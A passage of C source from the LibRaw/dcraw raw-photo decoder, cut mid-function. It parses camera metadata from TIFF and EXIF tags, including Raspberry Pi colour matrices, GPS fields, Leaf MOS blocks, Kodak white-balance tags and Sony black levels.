((!strncmp(make, "RaspberryPi",11)) && (!strncmp(model, "RP_imx219",9)))) {
char mn_text[512];
char *pos;
char ccms[512];
ushort l;
float num;
fgets(mn_text, MIN(len,511), ifp);
mn_text[511] = 0;
pos = strstr(mn_text, "gain_r=");
if (pos)
cam_mul[0] = atof(pos + 7);
pos = strstr(mn_text, "gain_b=");
if (pos)
cam_mul[2] = atof(pos + 7);
if ((cam_mul[0] > 0.001f) && (cam_mul[2] > 0.001f))
cam_mul[1] = cam_mul[3] = 1.0f;
else
cam_mul[0] = cam_mul[2] = 0.0f;
pos = strstr(mn_text, "ccm=");
if(pos)
{
pos +=4;
char *pos2 = strstr(pos, " ");
if(pos2)
{
l = pos2 - pos;
memcpy(ccms, pos, l);
ccms[l] = '\0';
#if defined WIN32 || defined(__MINGW32__)
// Win32 strtok is already thread-safe
pos = strtok(ccms, ",");
#else
char *last=0;
pos = strtok_r(ccms, ",",&last);
#endif
if(pos)
{
for (l = 0; l < 4; l++)
{
num = 0.0;
for (c = 0; c < 3; c++)
{
imgdata.color.ccm[l][c] = (float)atoi(pos);
num += imgdata.color.ccm[l][c];
#if defined WIN32 || defined(__MINGW32__)
pos = strtok(NULL, ",");
#else
pos = strtok_r(NULL, ",",&last);
#endif
if(!pos) goto end; // broken
}
if (num > 0.01)
FORC3 imgdata.color.ccm[l][c] = imgdata.color.ccm[l][c] / num;
}
}
}
}
end:;
}
else
#endif
parse_makernote (base, 0);
break;
case 40962: if (kodak) raw_width = get4(); break;
case 40963: if (kodak) raw_height = get4(); break;
case 41730:
if (get4() == 0x20002)
for (exif_cfa=c=0; c < 8; c+=2)
exif_cfa |= fgetc(ifp) * 0x01010101 << c;
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS parse_gps_libraw(int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
if (entries > 200)
return;
if (entries > 0)
imgdata.other.parsed_gps.gpsparsed = 1;
while (entries--) {
tiff_get(base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
switch (tag) {
case 1: imgdata.other.parsed_gps.latref = getc(ifp); break;
case 3: imgdata.other.parsed_gps.longref = getc(ifp); break;
case 5: imgdata.other.parsed_gps.altref = getc(ifp); break;
case 2:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.latitude[c] = getreal(type);
break;
case 4:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.longtitude[c] = getreal(type); /* sic: field name as spelled in the LibRaw API */
break;
case 7:
if (len == 3)
FORC(3) imgdata.other.parsed_gps.gpstimestamp[c] = getreal(type);
break;
case 6:
imgdata.other.parsed_gps.altitude = getreal(type);
break;
case 9: imgdata.other.parsed_gps.gpsstatus = getc(ifp); break;
}
fseek(ifp, save, SEEK_SET);
}
}
#endif
void CLASS parse_gps (int base)
{
unsigned entries, tag, type, len, save, c;
entries = get2();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if(len > 1024) continue; // no GPS tags are 1k or larger
switch (tag) {
case 1: case 3: case 5:
gpsdata[29+tag/2] = getc(ifp); break;
case 2: case 4: case 7:
FORC(6) gpsdata[tag/3*6+c] = get4(); break;
case 6:
FORC(2) gpsdata[18+c] = get4(); break;
case 18: case 29:
fgets ((char *) (gpsdata+14+tag/3), MIN(len,12), ifp);
}
fseek (ifp, save, SEEK_SET);
}
}
void CLASS romm_coeff (float romm_cam[3][3])
{
static const float rgb_romm[3][3] = /* ROMM == Kodak ProPhoto */
{ { 2.034193, -0.727420, -0.306766 },
{ -0.228811, 1.231729, -0.002922 },
{ -0.008565, -0.153273, 1.161839 } };
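// Compose the file's camera->ROMM matrix with the fixed ROMM(ProPhoto)->RGB
// matrix above to obtain the camera->RGB conversion: cmatrix = rgb_romm * romm_cam.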
int i, j, k;
for (i=0; i < 3; i++)
for (j=0; j < 3; j++)
for (cmatrix[i][j] = k=0; k < 3; k++)
cmatrix[i][j] += rgb_romm[i][k] * romm_cam[k][j];
}
void CLASS parse_mos (int offset)
{
char data[40];
int skip, from, i, c, neut[4], planes=0, frot=0;
static const char *mod[] =
{ "","DCB2","Volare","Cantare","CMost","Valeo 6","Valeo 11","Valeo 22",
"Valeo 11p","Valeo 17","","Aptus 17","Aptus 22","Aptus 75","Aptus 65",
"Aptus 54S","Aptus 65S","Aptus 75S","AFi 5","AFi 6","AFi 7",
"AFi-II 7","Aptus-II 7","","Aptus-II 6","","","Aptus-II 10","Aptus-II 5",
"","","","","Aptus-II 10R","Aptus-II 8","","Aptus-II 12","","AFi-II 12" };
float romm_cam[3][3];
fseek (ifp, offset, SEEK_SET);
while (1) {
if (get4() != 0x504b5453) break;
get4();
fread (data, 1, 40, ifp);
skip = get4();
from = ftell(ifp);
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp(data,"CameraObj_camera_type")) {
stmread(imgdata.lens.makernotes.body, skip, ifp);
}
if (!strcmp(data,"back_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.BodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.BodySerial));
strcpy (imgdata.shootinginfo.BodySerial, words[0]);
}
if (!strcmp(data,"CaptProf_serial_number")) {
char buffer [sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
int nwords;
stmread(buffer, skip, ifp);
nwords = getwords(buffer, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
strcpy (imgdata.shootinginfo.InternalBodySerial, words[0]);
}
#endif
// IB end
if (!strcmp(data,"JPEG_preview_data")) {
thumb_offset = from;
thumb_length = skip;
}
if (!strcmp(data,"icc_camera_profile")) {
profile_offset = from;
profile_length = skip;
}
if (!strcmp(data,"ShootObj_back_type")) {
fscanf (ifp, "%d", &i);
if ((unsigned) i < sizeof mod / sizeof (*mod))
strcpy (model, mod[i]);
}
if (!strcmp(data,"icc_camera_to_tone_matrix")) {
for (i=0; i < 9; i++)
((float *)romm_cam)[i] = int_to_float(get4());
romm_coeff (romm_cam);
}
if (!strcmp(data,"CaptProf_color_matrix")) {
for (i=0; i < 9; i++)
fscanf (ifp, "%f", (float *)romm_cam + i);
romm_coeff (romm_cam);
}
if (!strcmp(data,"CaptProf_number_of_planes"))
fscanf (ifp, "%d", &planes);
if (!strcmp(data,"CaptProf_raw_data_rotation"))
fscanf (ifp, "%d", &flip);
if (!strcmp(data,"CaptProf_mosaic_pattern"))
FORC4 {
fscanf (ifp, "%d", &i);
if (i == 1) frot = c ^ (c >> 1);
}
if (!strcmp(data,"ImgProf_rotation_angle")) {
fscanf (ifp, "%d", &i);
flip = i - flip;
}
if (!strcmp(data,"NeutObj_neutrals") && !cam_mul[0]) {
FORC4 fscanf (ifp, "%d", neut+c);
FORC3 cam_mul[c] = (float) neut[0] / neut[c+1];
}
if (!strcmp(data,"Rows_data"))
load_flags = get4();
parse_mos (from);
fseek (ifp, skip+from, SEEK_SET);
}
if (planes)
filters = (planes == 1) * 0x01010101 *
(uchar) "\x94\x61\x16\x49"[(flip/90 + frot) & 3];
}
void CLASS linear_table (unsigned len)
{
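// Read a linearization curve of up to 64K entries, pad the remainder with the
// last value, and derive 'maximum' (the white level) from the end of the curve.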
int i;
if (len > 0x10000) len = 0x10000;
read_shorts (curve, len);
for (i=len; i < 0x10000; i++)
curve[i] = curve[i-1];
maximum = curve[len<0x1000?0xfff:len-1];
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS Kodak_WB_0x08tags (int wb, unsigned type)
{
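// Convert a Kodak (R,G,B) multiplier triple into WB_Coeffs[wb]: the green slots
// get mul[1], while red and blue get mul[1]^2/mul[0] and mul[1]^2/mul[2].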
float mul[3]={1,1,1}, num, mul2;
int c;
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
imgdata.color.WB_Coeffs[wb][1] = imgdata.color.WB_Coeffs[wb][3] = mul[1];
mul2 = mul[1] * mul[1];
imgdata.color.WB_Coeffs[wb][0] = mul2 / mul[0];
imgdata.color.WB_Coeffs[wb][2] = mul2 / mul[2];
return;
}
/* Thanks to Alexey Danilchenko for wb as-shot parsing code */
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
entries = get2();
if (entries > 1024) return;
INT64 fsize = ifp->size();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > 2*fsize) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag | 0x20000,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
if (tag == 1011) imgdata.other.FlashEC = getreal(type);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0f,get2());
wbi = -2;
}
if (tag == 0x0848) Kodak_WB_0x08tags(LIBRAW_WBI_Daylight, type);
if (tag == 0x0849) Kodak_WB_0x08tags(LIBRAW_WBI_Tungsten, type);
if (tag == 0x084a) Kodak_WB_0x08tags(LIBRAW_WBI_Fluorescent, type);
if (tag == 0x084b) Kodak_WB_0x08tags(LIBRAW_WBI_Flash, type);
if (tag == 0x0e93) imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = get2();
if (tag == 0x09ce)
stmread(imgdata.shootinginfo.InternalBodySerial,len, ifp);
if (tag == 0xfa00)
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if (tag == 0xfa27)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
}
if (tag == 0xfa28)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
}
if (tag == 0xfa29)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
}
if (tag == 0xfa2a)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
}
if (tag == 2120 + wbi ||
(wbi<0 && tag == 2125)) /* use Auto WB if illuminant index is not set */
{
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
FORC3 cam_mul[c] = mul[1] / mul[c]; /* normalise against green */
}
if (tag == 2317) linear_table (len);
if (tag == 0x903) iso_speed = getreal(type);
//if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#else
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2, wbtemp=6500;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
entries = get2();
if (entries > 1024) return;
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,get2());
wbi = -2;
}
if (tag == 2118) wbtemp = getint(type);
if (tag == 2120 + wbi && wbi >= 0)
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,getreal(type));
if (tag == 2130 + wbi)
FORC3 mul[c] = getreal(type);
if (tag == 2140 + wbi && wbi >= 0)
FORC3 {
for (num=i=0; i < 4; i++)
num += getreal(type) * pow (wbtemp/100.0, i);
cam_mul[c] = 2048 / fMAX(1.0,(num * mul[c]));
}
if (tag == 2317) linear_table (len);
if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#endif
//@end COMMON
void CLASS parse_minolta (int base);
int CLASS parse_tiff (int base);
//@out COMMON
int CLASS parse_tiff_ifd (int base)
{
unsigned entries, tag, type, len, plen=16, save;
int ifd, use_cm=0, cfa, i, j, c, ima_len=0;
char *cbuf, *cp;
uchar cfa_pat[16], cfa_pc[] = { 0,1,2,3 }, tab[256];
double fm[3][4], cc[4][4], cm[4][3], cam_xyz[4][3], num;
double ab[]={ 1,1,1,1 }, asn[] = { 0,0,0,0 }, xyz[] = { 1,1,1 };
unsigned sony_curve[] = { 0,0,0,0,0,4095 };
unsigned *buf, sony_offset=0, sony_length=0, sony_key=0;
struct jhead jh;
int pana_raw = 0;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *sfp;
#endif
if (tiff_nifds >= sizeof tiff_ifd / sizeof tiff_ifd[0])
return 1;
ifd = tiff_nifds++;
for (j=0; j < 4; j++)
for (i=0; i < 4; i++)
cc[j][i] = i == j;
entries = get2();
if (entries > 512) return 1;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > fsize*2) continue; // skip tag pointing out of 2xfile
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag|(pana_raw?0x30000:0),type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncasecmp(make, "SONY", 4) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "HV",2))))
{
switch (tag) {
case 0x7300: // SR2 black level
for (int i = 0; i < 4 && i < len; i++)
cblack[i] = get2();
break;
case 0x7480:
case 0x7820:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
break;
case 0x7481:
case 0x7821:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1];
break;
case 0x7482:
case 0x7822:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
break;
case 0x7483:
case 0x7823:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1];
break;
case 0x7484:
case 0x7824:
imgdata.color.WBCT_Coeffs[0][0] = 4500;
FORC3 imgdata.color.WBCT_Coeffs[0][c+1] = get2();
imgdata.color.WBCT_Coeffs[0][4] = imgdata.color.WBCT_Coeffs[0][2];
break;
case 0x7486:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
break;
case 0x7825:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
break;
case 0x7826:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1];
break;
case 0x7827:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1];
break;
case 0x7828:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1];
break;
case 0x7829:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1];
break;
case 0x782a:
imgdata.color.WBCT_Coeffs[1][0] = 8500;
FORC3 imgdata.color.WBCT_Coeffs[1][c+1] = get2();
imgdata.color.WBCT_Coeffs[1][4] = imgdata.color.WBCT_Coeffs[1][2];
break;
case 0x782b:
imgdata.color.WBCT_Coeffs[2][0] = 6000;
FORC3 imgdata.color.WBCT_Coeffs[2][c+1] = get2();
imgdata.color.WBCT_Coeffs[2][4] = imgdata.color.WBCT_Coeffs[2][2];
break;
case 0x782c:
imgdata.color.WBCT_Coeffs[3][0] = 3200;
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][c] = imgdata.color.WBCT_Coeffs[3][c+1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][3] = imgdata.color.WBCT_Coeffs[3][4] = imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][1];
break;
case 0x782d:
imgdata.color.WBCT_Coeffs[4][0] = 2500;
FORC3 imgdata.color.WBCT_Coeffs[4][c+1] = get2();
imgdata.color.WBCT_Coeffs[4][4] = imgdata.color.WBCT_Coeffs[4][2];
break;
case 0x787f:
FORC3 imgdata.color.linear_max[c] = get2();
imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
break;
}
}
#endif
switch (tag) {
case 1: if(len==4) pana_raw = get4(); break;
case 5: width = get2(); break;
case 6: height = get2(); break;
case 7: width += get2(); break;
case 9: if ((i = get2())) filters = i;
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=i;
#endif
break;
case 8:
case 10:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=get2();
#endif
break;
case 14: case 15: case 16:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
imgdata.color.linear_max[tag-14] = get2();
if (tag == 15 ) imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
}
#endif
break;
case 17: case 18:
if (type == 3 && len == 1)
cam_mul[(tag-17)*2] = get2() / 256.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 19:
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = 0x100;
} else get4();
}
}
break;
#endif
case 23:
if (type == 3) iso_speed = get2();
break;
case 28: case 29: case 30:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
{
pana_black[tag-28] = get2();
}
else
#endif
{
cblack[tag-28] = get2();
cblack[3] = cblack[1];
}
break;
case 36: case 37: case 38:
cam_mul[tag-36] = get2();
break;
case 39:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
} else fseek(ifp, 6, SEEK_CUR);
}
}
break;
#endif
if (len < 50 || cam_mul[0]) break;
fseek (ifp, 12, SEEK_CUR);
FORC3 cam_mul[c] = get2();
break;
case 46:
if (type != 7 || fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) break;
thumb_offset = ftell(ifp) - 2;
thumb_length = len;
break;
case 61440: /* Fuji HS10 table */
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
case 2: case 256: case 61441: /* ImageWidth */
tiff_ifd[ifd].t_width = getint(type);
break;
case 3: case 257: case 61442: /* ImageHeight */
tiff_ifd[ifd].t_height = getint(type);
break;
case 258: /* BitsPerSample */
case 61443:
tiff_ifd[ifd].samples = len & 7;
tiff_ifd[ifd].bps = getint(type);
if (tiff_bps < tiff_ifd[ifd].bps)
tiff_bps = tiff_ifd[ifd].bps;
break;
case 61446:
raw_height = 0;
if (tiff_ifd[ifd].bps > 12) break;
load_raw = &CLASS packed_load_raw;
load_flags = get4() ? 24:80;
break;
case 259: /* Compression */
tiff_ifd[ifd].comp = getint(type);
break;
case 262: /* PhotometricInterpretation */
tiff_ifd[ifd].phint = get2();
break;
case 270: /* ImageDescription */
fread (desc, 512, 1, ifp);
break;
case 271: /* Make */
fgets (make, 64, ifp);
break;
case 272: /* Model */
fgets (model, 64, ifp);
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 278:
tiff_ifd[ifd].rows_per_strip = getint(type);
break;
#endif
case 280: /* Panasonic RW2 offset */
if (type != 4) break;
load_raw = &CLASS panasonic_load_raw;
load_flags = 0x2008;
case 273: /* StripOffset */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_offsets = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_offsets_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_offsets[i]=get4()+base;
fseek(ifp,sav,SEEK_SET); // restore position
}
/* fallback */
#endif
case 513: /* JpegIFOffset */
case 61447:
tiff_ifd[ifd].offset = get4()+base;
if (!tiff_ifd[ifd].bps && tiff_ifd[ifd].offset > 0) {
fseek (ifp, tiff_ifd[ifd].offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
tiff_ifd[ifd].comp = 6;
tiff_ifd[ifd].t_width = jh.wide;
tiff_ifd[ifd].t_height = jh.high;
tiff_ifd[ifd].bps = jh.bits;
tiff_ifd[ifd].samples = jh.clrs;
if (!(jh.sraw || (jh.clrs & 1)))
tiff_ifd[ifd].t_width *= jh.clrs;
if ((tiff_ifd[ifd].t_width > 4*tiff_ifd[ifd].t_height) & ~jh.clrs) {
tiff_ifd[ifd].t_width /= 2;
tiff_ifd[ifd].t_height *= 2;
}
i = order;
parse_tiff (tiff_ifd[ifd].offset + 12);
order = i;
}
}
break;
case 274: /* Orientation */
tiff_ifd[ifd].t_flip = "50132467"[get2() & 7]-'0';
break;
case 277: /* SamplesPerPixel */
tiff_ifd[ifd].samples = getint(type) & 7;
break;
case 279: /* StripByteCounts */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_byte_counts = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_byte_counts_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_byte_counts[i]=get4();
fseek(ifp,sav,SEEK_SET); // restore position
}
/* fallback */
#endif
case 514:
case 61448:
tiff_ifd[ifd].bytes = get4();
break;
case 61454:
FORC3 cam_mul[(4-c) % 3] = getint(type);
break;
case 305: case 11: /* Software */
fgets (software, 64, ifp);
if (!strncmp(software,"Adobe",5) ||
!strncmp(software,"dcraw",5) ||
!strncmp(software,"UFRaw",5) ||
!strncmp(software,"Bibble",6) ||
!strcmp (software,"Digital Photo Professional"))
is_raw = 0;
break;
case 306: /* DateTime */
get_timestamp(0);
break;
case 315: /* Artist */
fread (artist, 64, 1, ifp);
break;
case 317:
tiff_ifd[ifd].predictor = getint(type);
break;
case 322: /* TileWidth */
tiff_ifd[ifd].t_tile_width = getint(type);
break;
case 323: /* TileLength */
tiff_ifd[ifd].t_tile_length = getint(type);
break;
case 324: /* TileOffsets */
tiff_ifd[ifd].offset = len > 1 ? ftell(ifp) : get4();
if (len == 1)
tiff_ifd[ifd].t_tile_width = tiff_ifd[ifd].t_tile_length = 0;
if (len == 4) {
load_raw = &CLASS sinar_4shot_load_raw;
is_raw = 5;
}
break;
case 325:
tiff_ifd[ifd].bytes = len > 1 ? ftell(ifp): get4();
break;
case 330: /* SubIFDs */
if (!strcmp(model,"DSLR-A100") && tiff_ifd[ifd].t_width == 3872) {
load_raw = &CLASS sony_arw_load_raw;
data_offset = get4()+base;
ifd++;
#ifdef LIBRAW_LIBRARY_BUILD
if (ifd >= sizeof tiff_ifd / sizeof tiff_ifd[0])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
break;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make,"Hasselblad",10) && libraw_internal_data.unpacker_data.hasselblad_parser_flag) {
fseek (ifp, ftell(ifp)+4, SEEK_SET);
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
}
#endif
if(len > 1000) len=1000; /* 1000 SubIFDs is enough */
while (len--) {
i = ftell(ifp);
fseek (ifp, get4()+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
fseek (ifp, i+4, SEEK_SET);
}
break;
case 339:
tiff_ifd[ifd].sample_format = getint(type);
break;
case 400:
strcpy (make, "Sarnoff");
maximum = 0xfff;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 700:
if((type == 1 || type == 2 || type == 6 || type == 7) && len > 1 && len < 5100000)
{
xmpdata = (char*)malloc(xmplen = len+1);
fread(xmpdata,len,1,ifp);
xmpdata[len]=0;
}
break;
#endif
case 28688:
FORC4 sony_curve[c+1] = get2() >> 2 & 0xfff;
for (i=0; i < 5; i++)
for (j = sony_curve[i]+1; j <= sony_curve[i+1]; j++)
curve[j] = curve[j-1] + (1 << i);
break;
case 29184: sony_offset = get4(); break;
case 29185: sony_length = get4(); break;
case 29217: sony_key = get4(); break;
case 29264:
parse_minolta (ftell(ifp));
raw_width = 0;
break;
case 29443:
FORC4 cam_mul[c ^ (c < 2)] = get2();
break;
case 29459:
FORC4 cam_mul[c] = get2();
i = (cam_mul[1] == 1024 && cam_mul[2] == 1024) << 1;
SWAP (cam_mul[i],cam_mul[i+1])
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 30720: // Sony matrix, Sony_SR2SubIFD_0x7800
for (i=0; i < 3; i++) {
float num = 0.0;
for (c=0; c<3; c++) {
imgdata.color.ccm[i][c] = (float) ((short)get2());
num += imgdata.color.ccm[i][c];
}
if (num > 0.01) FORC3 imgdata.color.ccm[i][c] = imgdata.color.ccm[i][c] / num;
}
break;
#endif
case 29456: // Sony black level, Sony_SR2SubIFD_0x7310, no longer needs to be divided by 4
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black = i;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr, _("...Sony black: %u cblack: %u %u %u %u\n"),black, cblack[0],cblack[1],cblack[2], cblack[3]);
#endif
break;
case 33405: /* Model2 */
fgets (model2, 64, ifp);
break;
case 33421: /* CFARepeatPatternDim */
if (get2() == 6 && get2() == 6)
filters = 9;
break;
case 33422: /* CFAPattern */
if (filters == 9) {
FORC(36) ((char *)xtrans)[c] = fgetc(ifp) & 3;
break;
}
case 64777: /* Kodak P-series */
if(len == 36)
{
filters = 9;
colors = 3;
FORC(36) xtrans[0][c] = fgetc(ifp) & 3;
}
else if(len > 0)
{
if ((plen=len) > 16) plen = 16;
fread (cfa_pat, 1, plen, ifp);
for (colors=cfa=i=0; i < plen && colors < 4; i++) {
colors += !(cfa & (1 << cfa_pat[i]));
cfa |= 1 << cfa_pat[i];
}
if (cfa == 070) memcpy (cfa_pc,"\003\004\005",3); /* CMY */
if (cfa == 072) memcpy (cfa_pc,"\005\003\004\001",4); /* GMCY */
goto guess_cfa_pc;
}
break;
case 33424:
case 65024:
fseek (ifp, get4()+base, SEEK_SET);
parse_kodak_ifd (base);
break;
case 33434: /* ExposureTime */
tiff_ifd[ifd].t_shutter = shutter = getreal(type);
break;
case 33437: /* FNumber */
aperture = getreal(type);
break;
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
case 0xc62f:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
